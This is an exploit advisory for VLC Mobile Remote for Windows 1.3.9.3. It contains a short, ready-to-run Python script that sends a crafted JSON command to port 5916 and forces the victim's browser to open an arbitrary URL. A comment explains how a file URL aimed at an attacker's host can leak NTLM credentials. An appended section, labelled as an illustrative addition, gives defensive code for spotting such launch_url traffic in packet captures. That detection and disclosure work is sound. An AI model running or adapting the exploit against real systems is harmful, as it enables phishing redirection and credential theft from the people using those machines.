# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3 Remote Arbitrary URL Launch
# Date: 06/24/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://vlcmobileremote.com
# Software Link: https://vlcmobileremote.com/Releases/Setup.exe
# Version: 1.3.9.3
# Tested on: Windows 10 (Build 19044)

'''
Description:
VLC Mobile Remote for Windows 1.3.9.3 allows an unauthenticated attacker to remotely
cause the target system to open any URL in the victim’s default web browser by sending
a specially crafted request. This can lead to forced browsing to malicious sites,
phishing attacks, or NTLM credential exposure via SMB or file URLs.
'''

import socket, time, json

HOST = "192.168.8.105"
PORT = 5916
AUTH_KEY = "I2t3H*9s65J7F!E03K9M"
URL = "https://google.com" # NTLM credential leakage with file:///// 192.168.8.100/any

pkt = {
    "appAuthenticationKey": AUTH_KEY,
    "password": "",
    "sentTime": str(int(time.time() * 1000)),
    "request": f"/requests/system/command?key=launch_url&value={URL}"
}

with socket.socket() as s:
    s.connect((HOST, PORT))
    s.sendall((json.dumps(pkt) + "\x0a").encode())
    print(f"[>] Launching URL: {URL}")

print("[✓] Done.")
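
Detection-side view of the message format used by the script above, as an added example that is not part of the original advisory or the vendor's code: it parses newline-delimited JSON from a reassembled TCP stream to port 5916 and flags `launch_url` commands. The function names, severity labels and sample messages are constructed for illustration; only the JSON field names and the request path come from the script.

```python
import json
from urllib.parse import parse_qs

RISKY_SCHEMES = {"file", "smb"}  # the advisory names SMB and file URLs for NTLM exposure

def classify_vmr_message(raw: bytes):
    """Return a finding dict for a launch_url command, else None."""
    try:
        msg = json.loads(raw.decode("utf-8", "replace").strip())
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    path, _, query = str(msg.get("request", "")).partition("?")
    params = parse_qs(query, keep_blank_values=True)
    if not path.endswith("/system/command") or params.get("key") != ["launch_url"]:
        return None
    value = params.get("value", [""])[0]
    scheme = value.split(":", 1)[0].lower() if ":" in value else ""
    unc = value.startswith("\\\\")  # \\host\share form
    return {
        "url": value,
        "scheme": scheme or ("unc" if unc else ""),
        # Severity labels are an assumption of this example, not from the advisory.
        "severity": "high" if unc or scheme in RISKY_SCHEMES else "medium",
        "empty_password": msg.get("password", "") == "",
    }

def scan_stream(stream: bytes):
    """Split a reassembled TCP payload on newlines and collect findings."""
    results = (classify_vmr_message(l) for l in stream.split(b"\n") if l.strip())
    return [r for r in results if r]

# Constructed sample payload (not captured traffic); "<key>" is a placeholder.
SAMPLE = b"\n".join(json.dumps(m).encode() for m in [
    {"appAuthenticationKey": "<key>", "password": "", "sentTime": "0",
     "request": "/requests/system/command?key=launch_url&value=https://example.test/"},
    {"appAuthenticationKey": "<key>", "password": "", "sentTime": "0",
     "request": "/requests/system/command?key=launch_url&value=file://///192.0.2.10/any"},
    {"appAuthenticationKey": "<key>", "password": "", "sentTime": "0",
     "request": "/requests/status.json"},  # constructed non-launch request
]) + b"\n"

if __name__ == "__main__":
    for finding in scan_stream(SAMPLE):
        print(finding)
```

Feed `scan_stream` the client-to-server bytes of each TCP session to port 5916 exported from a packet capture; a `high` finding from a host that is not the paired phone is worth correlating with outbound SMB from the same machine.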